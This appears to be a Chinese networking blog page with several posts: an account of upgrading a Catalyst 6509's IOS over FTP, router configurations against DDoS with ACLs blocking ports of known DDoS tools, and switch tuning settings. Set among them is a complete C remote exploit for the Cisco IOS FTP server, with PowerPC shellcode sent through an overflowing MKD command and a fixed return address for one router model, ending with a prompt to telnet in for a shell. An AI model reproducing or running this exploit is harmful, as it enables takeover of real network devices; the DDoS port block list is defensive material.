WS-X6548-GE-TX这个48口的RJ-45交换模块不能使用，交换机又没有配其他的带RJ-45接口的模块。这可怎么办？因为用思科的TFTP Server 升级就必须得将交换机和网络上的一台装有TFTP Server的PC相连。经过一番寻找，终于发现超级引擎720上面有一个RJ-45模样的接口，旁边写着Link的字样，有戏！结果拿来网线插上一试，发现指示灯都不亮。本来以为有了希望的心情一下又堕入了谷底，但是不能放弃。因为这个接口是唯一的希望，不然用xmodem方式传输41兆的IOS简直让我望而却步。因为我曾经用xmodem方式传过一个2950交换机的IOS，也就两兆多大小吧，足足用了两个钟头。41兆？最快也得30几个小时！于是开始上网找资料……，终于发现问题：原来超级引擎720上的port 2有两种模式一种是RJ-45接口，还有一种是SFP（a small form-factor pluggable）接口。而默认的设置是SFP，要使用RJ-45接口就必须更改设置。键入命令：

 程序代码

Router(config)# interface gigabitethernet 5/2 
Router(config-if)# media-type rj45
Router(config-if)#no shutdown

橘红色的指示灯终于变成了绿色。呼……长长的出了一口气。心想，都给很多交换机升过级了，接下来的事情就应该很easy了嘛！谁知道拦路虎并没有就此罢休。

问题二：TFTP 传输协议只支持32兆？

接下来给接口配上管理地址，再把原来的IOS备份出来。在超级终端全局模式下敲入命令：

程序代码

Router# copy sup-bootflash: s72033-pk9sv-mz.122-14.SX1.bin tftp://192.168.1.1

TFTP Server出现一连串＃字号，一切ok！就等着吧！谁知道眼看着就要传完的时候，系统提示：timeout ! write error！我当时就晕了，网线坏了？传输错误？磁盘空间不足？都没有啊。再试，还是这样。看看传下来的IOS 不大不小正好32兆，而完整的IOS就32.1兆。怎么就差一点点啊！难道是TFTP的软件有问题，版本太低？上网下载了个第三方的TFTP Server一试，结果还是这样。又找来3Com的TFTP Server，这次更小，传到16兆的时候就断开了，系统提示还是超时和写入错误。仔细分析，终于发现问题关键所在。两次传输，一次正好32兆，一次正好16兆。连字节数都不差，肯定不是传输线路问题。找来资料一查，原来TFTP （Trivial File Transfer Protocol）普通文件传输协议最大就支持传输32兆的文件。于是又找来思科文档，一番查询，找出了第二种解决方法，用FTP就行了。于是在PC上建好FTP服务，键入如下命令：

 程序代码

Router# configure terminal
Router(config)# ip ftp username username
Router(config)# ip ftp password password
Router(config)# end
Router#copy sup-bootflash: s72033-pk9sv-mz.122-14.SX1.bin
ftp:[//[username[:password]@]192.168.1.1]

这次非常成功！没有几分钟，系统提示successful！

问题三：协议错误

接下来就是将新的IOS传上去。这次轻车熟路的键入命令：

 程序代码
Router# configure terminal
Router(config)# ip ftp username username 
Router(config)# ip ftp password password
Router(config)# end
Router# copy ftp:[[//[username[:password]@]192.168.1.1] /
s72033-jk9o3sv-mz.122-17a.SX.bin] sup-bootflash:

结果系统这次提示Protocol error！我心中一紧，不会吧？刚刚才从交换机上把IOS下载下来，没有任何问题啊？怎么马上就不行了。重试一次，下载是好的，上传提示协议错误……怎么会这样呢？分析半天，问题可能出在FTP Server，我的FTP Server是用Server－U这个第三方软件做的，于是换成微软Windows 2000自带的FTP Server。再试，哈哈，成了！不再提示协议错误。屏幕显示Loading……，几秒后提示信息：Flash空间不足！

问题四：Flash空间不足

6509标准配置的Flash为64兆，标配IOS大小32.1兆，要升级的12.2(17a)SX版本IOS大小为40.6 兆，空间当然不足。但是这很简单，将Flash里面原来的IOS删除了然后再上传。于是键入命令：

 程序代码

Router#delete sup-bootflash: s72033-pk9sv-mz.122-14.SX1.bin

然后再传。提示信息还是空间不足！我的脑袋又是嗡的一响，不会又出点什么差错吧？现在交换机的IOS可是被我给删除了，现在要是掉电或者重启，交换机就起不来了啊。用show命令看，IOS文件已经没有了，但是空间还是剩余30多兆，就是说Flash没有被清空？怎么办？想起以前删除vlan.dat文件以后要重启交换机才能生效，可是现在重启是万万不行的。怎么办？我手心开始冒冷汗。上思科网站查……，终于，找到一条命令squeeze，该命令是将已经删除的文件彻底清空，就好比清空回收站一样。运行：

 程序代码

Router#squeeze sup-bootflash: 

果然好用。这下再看Flash已经被彻底清空，可用空间64兆。于是再用FTP上传，几分钟以后看见屏幕上提示successful。Reload一下，用show flash命令看IOS版本已经变成了12.2(17a)SX。插上新模块WS-X6548-GE-TX一试，已经好用了。一看表，已经过去8个多小时了，终于长长的舒了一口气，价值不菲的IOS总算成功升级了！

Cisco IOS FTP server remote exploit

admin@ruery.com(Ruery) — Sat,11 Oct 2008 11:01:33 +0800

#include
#include
#include
#include

#define PORT 21

int main(int argc, char **argv)
{
unsigned char sendbuf[] =

"MKD "

/* .equ vty_info, 0x8182da60    # pointer to VTY info */
/* .equ terminate, 0x80e4086c   # kill a process */

"\x3c\x80\x81\x83"      /* lis     4,vty_info@ha */
"\x38\x84\xda\x60"      /* la      4,vty_info@l(4) */
"\x7d\x08\x42\x78"      /* xor     8,8,8 */
"\x7c\xe4\x40\x2e"      /* lwzx    7,4,8 */
"\x91\x07\x01\x74"      /* stw     8,372(7) */
"\x39\x08\xff\xff"      /* subi    8,8,1 */
"\x38\xe7\x09\x1a"      /* addi    7,7,233 */
"\x91\x07\x04\xca"      /* stw     8,1226(7) */
"\x7d\x03\x43\x78"      /* mr      3,8 */
"\x3c\x80\x80\xe4"      /* lis     4,terminate@ha */
"\x38\x84\x08\x6c"      /* la      4,terminate@l(4) */
"\x7c\x89\x03\xa6"      /* mtctr   4 */
"\x4e\x80\x04\x20"      /* bctr    */

/* exists cleanly without adversely affecting the FTP server */

"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */

"\x80\x06\x23\xB8"      /* return address */
"\x0d\x0a";

/* trampoline code */
/* when the overflow occurs r26+0x14 points to the shellcode */
/*
0x800623B8      lwz     26, 20(26)
0x800623BC      mtctr   26
0x800623C0      mr      3, 27
0x800623C4      bctrl
*/

unsigned char recvbuf[256];
struct sockaddr_in servaddr;
int s;

if (argc != 2)
       {
       printf ("\nCisco IOS FTP server remote exploit\n");

       printf ("\nUsage: %s \n",argv[0]);
       exit(-1);
       }

servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = inet_addr(argv[1]);
servaddr.sin_port = htons(PORT);

s = socket(AF_INET, SOCK_STREAM, 0);
connect (s, (struct sockaddr *) &servaddr, sizeof(servaddr));
printf ("\nCisco IOS FTP server remote exploit\n");
printf ("Specific offsets for IOS 12.3(18) on a 2621XM router\n\n");
printf ("Sending exploit...\n\n");

if (send(s, sendbuf, sizeof(sendbuf)-1, 0) == 0)
       {
       printf("Error sending packet...quitting\n\n");
       exit (1);
       }
recv (s, recvbuf, sizeof(recvbuf)-1,0);
printf ("Now telnet to the router for a shell...\n\n");
}

Cisco路由器防止分布式拒绝服务攻击

admin@ruery.com(Ruery) — Sat,23 Aug 2008 10:48:13 +0800

到目前为止，进行DDoS攻击的防御还是比较困难的。首先，这种攻击的特点是它利用了TCP/IP协议的漏洞，除非你不用TCP/IP，才有可能完全抵御住DDoS攻击。一位资深的安全专家给了个形象的比喻：DDoS就好象有1,000个人同时给你家里打电话，这时候你的朋友还打得进来吗？

不过即使它难于防范，也不是说我们就应该逆来顺受，实际上防止DDoS并不是绝对不可行的事情。对Cisco路由器我们可以首先在路由器上打开CEF功能（Cisco Express Forwarding）、使用Unicast RPF （Unicast Reverse Path Forwarding），然后利用访问控制列表（ACL）过滤并设置SYN数据包流量速率或通过升级版本过低的ISO、为路由器建立log server等措施来建立安全防范。具体的使用方法是：

1、使用 ip verfy unicast reverse-path 网络接口命令
　　这个功能检查每一个经过路由器的数据包。在路由器的CEF（Cisco Express Forwarding）表该数据包所到达网络接口的所有路由项中，如果没有该数据包源IP地址的路由，路由器将丢弃该数据包。例如，路由器接收到一个源IP地址为1.2.3.4的数据包，如果 CEF路由表中没有为IP地址1.2.3.4提供任何路由（即反向数据包传输时所需的路由），则路由器会丢弃它。
　　单一地址反向传输路径转发（Unicast Reverse Path Forwarding）在ISP（局端）实现阻止SMURF攻击和其它基于IP地址伪装的攻击。这能够保护网络和客户免受来自互联网其它地方的侵扰。使用Unicast RPF 需要打开路由器的"CEF swithing"或"CEF distributed switching"选项。不需要将输入接口配置为CEF交换（switching）。只要该路由器打开了CEF功能，所有独立的网络接口都可以配置为其它交换（switching）模式。RPF（反向传输路径转发）属于在一个网络接口或子接口上激活的输入端功能，处理路由器接收的数据包。
　　在路由器上打开CEF功能是非常重要的，因为RPF必须依靠CEF。Unicast RPF包含在支持CEF的Cisco IOS 12.0 及以上版本中，但不支持Cisco IOS 11.2或11.3版本。

2、使用访问控制列表（ACL）过滤RFC 1918中列出的所有地址
　　参考以下例子：
　　interface xy
　　ip access-group 101 in
　　access-list 101 deny ip 10.0.0.0 0.255.255.255 any
　　access-list 101 deny ip 192.168.0.0 0.0.255.255 any
　　access-list 101 deny ip 172.16.0.0 0.15.255.255 any
　　access-list 101 permit ip any any

3、参照RFC 2267，使用访问控制列表（ACL）过滤进出报文
　　参考以下例子：
　　{ISP中心} -- ISP端边界路由器 -- 客户端边界路由器 -- {客户端网络}
　　ISP端边界路由器应该只接受源地址属于客户端网络的通信，而客户端网络则应该只接受源地址未被客户端网络过滤的通信。以下是ISP端边界路由器的访问控制列表（ACL）例子：
　　access-list 190 permit ip {客户端网络} {客户端网络掩码} any

　　access-list 190 deny ip any any [log]
　　interface {内部网络接口} {网络接口号}
　　ip access-group 190 in
　　以下是客户端边界路由器的ACL例子：
　　access-list 187 deny ip {客户端网络} {客户端网络掩码} any
　　access-list 187 permit ip any any
　　access-list 188 permit ip {客户端网络} {客户端网络掩码} any
　　access-list 188 deny ip any any
　　interface {外部网络接口} {网络接口号}
　　ip access-group 187 in
　　ip access-group 188 out
　　如果打开了CEF功能，通过使用单一地址反向路径转发（Unicast RPF），能够充分地缩短访问控制列表（ACL）的长度以提高路由器性能。为了支持Unicast RPF，只需在路由器完全打开CEF；打开这个功能的网络接口并不需要是CEF交换接口。

4、使用CAR（Control Access Rate）限制ICMP数据包流量速率
　　参考以下例子：
　　interface xy
　　rate-limit output access-group 2020 3000000 512000 786000 conform-action
　　transmit exceed-action drop
　　access-list 2020 permit icmp any any echo-reply

5、设置SYN数据包流量速率
　　interface {int}
　　rate-limit output access-group 153 45000000 100000 100000 conform-action
　　transmit exceed-action drop
　　rate-limit output access-group 152 1000000 100000 100000 conform-action
　　transmit exceed-action drop
　　access-list 152 permit tcp any host eq www
　　access-list 153 permit tcp any host eq www established
　　在实现应用中需要进行必要的修改，替换：
　　45000000为最大连接带宽
　　1000000为SYN flood流量速率的30%到50%之间的数值。
　　burst normal（正常突变）和 burst max（最大突变）两个速率为正确的数值。
　　注意，如果突变速率设置超过30%，可能会丢失许多合法的SYN数据包。使用"show interfaces rate-limit"命令查看该网络接口的正常和过度速率，能够帮助确定合适的突变速率。这个SYN速率限制数值设置标准是保证正常通信的基础上尽可能地小。
　　警告：一般推荐在网络正常工作时测量SYN数据包流量速率，以此基准数值加以调整。必须在进行测量时确保网络的正常工作以避免出现较大误差。
　　另外，建议考虑在可能成为SYN攻击的主机上安装IP Filter等IP过滤工具包。

6、搜集证据并联系网络安全部门或机构
　　如果可能，捕获攻击数据包用于分析。建议使用SUN工作站或Linux等高速计算机捕获数据包。常用的数据包捕获工具包括TCPDump和snoop等。基本语法为：
　　tcpdump -i interface -s 1500 -w capture_file
　　snoop -d interface -o capture_file -s 1500
　　本例中假定MTU大小为1500。如果MTU大于1500，则需要修改相应参数。将这些捕获的数据包和日志作为证据提供给有关网络安全部门或机构。

为了防止利用IP Spoofing手段假冒源地址进行的DoS攻击对整个网络造成的冲击。主要配置在边缘路由设备（即直接与终端用户网络互连的路由设备）上，根据用户网段规划添加源路由检查。

针对不同DDOS攻击的端口进行过滤，在实施时必须探测到DDOS攻击的端口。
! The TRINOO DDoS system
Router(Config)# access-list 113 deny tcp any any eq 27665 log
Router(Config)# access-list 113 deny udp any any eq 31335 log
Router(Config)# access-list 113 deny udp any any eq 27444 log
! The Stacheldtraht DDoS system
Router(Config)# access-list 113 deny tcp any any eq 16660 log
Router(Config)# access-list 113 deny tcp any any eq 65000 log
! The TrinityV3 System
Router(Config)# access-list 113 deny tcp any any eq 33270 log
Router(Config)# access-list 113 deny tcp any any eq 39168 log
! The SubSeven DDoS system and some Variants
Router(Config)# access-list 113 deny tcp any any range 6711 6712 log
Router(Config)# access-list 113 deny tcp any any eq 6776 log
Router(Config)# access-list 113 deny tcp any any eq 6669 log
Router(Config)# access-list 113 deny tcp any any eq 2222 log
Router(Config)# access-list 113 deny tcp any any eq 7000 log
Router(Config)# interface eth 0/2
Router(Config-if)# ip access-group 113 in

DDOS是利用TCP协议的漏洞, 目前没有什么有效的手段防护，笔者认为最有效的方法就是拼资源, 其次可以加个firewall。DDOS多是有目的的攻击, 是很难防护的，基本上，路由器防范DoS攻击的能力还是很弱的，尽管我们在路由器上采取了适当措施，以上配置不建议在核心和汇聚层设备上实行。遇到问题时一种快速的手段, 就是利用2分法, 快速的查出它的来源地址, 然后封掉它。

因此，防止各种DoS攻击是非常必要的。用户需要注意的是，以上介绍的几种方法，对付不同类型的DoS攻击的能力是不同的，对路由器CPU和内存资源的占用也有很大差别，在实际环境中，用户需要根据自身情况和路由器的性能来选择使用适当的方式。

Switch优化配置

admin@ruery.com(Ruery) — Fri,22 Aug 2008 12:01:37 +0800

/***********************交换机优化配置*************************/
int range f
spanning-tree backbonefast    /****在所有交换机上设置
spanning-tree uplinkfast    /****在与核心交换机连接的交换机上行链路端口设置
!
spanning-tree portfast
spanning-tree portfast bpduguard    /****如果该端口连接了非授权设备，则端口无效，
!                                         设备进入ERR-DISABLE状态，需要手工重新启动。
spanning-tree portfast bpdufilter default    /****如果全局配置，则如果端口接受到BPDU，
                                              则该端口丢弃portfast特性，改为正常的STP操作，
                                              如果在端口配置，则端口丢弃BPDU。
!
int g1/0/1
spanning-tree guard root    /****在所有接入上层交换机的交换机上配置
!
errdisable detect cause all    /****启用对错误的检测
errdisable recovery cause all    /****启用自动恢复
errdisable recovery interval 60    /****自动恢复时间间隔
!
int g2/1            /***********检测交换机端口的单向链路
udld port aggressive
int g2/2
udld port aggressive
exit
!
int g1/1
flowcontrol receive desired    /****是否处理接受到的暂停侦
flowcontrol send desired    /****表示发生拥塞的时候是否发送暂停侦
exit
!
protocol-filtering    /****在端口上过滤协议
int range g2/1 -2
switchport protocol appletalk off
switchport protocol ip off
switchport protocol ipx on
!
int range g2/1 -2    /****广播和多播抑制，只允许5%的广播和多播流量
storm-control broadcast level 5
storm-control multicast level 5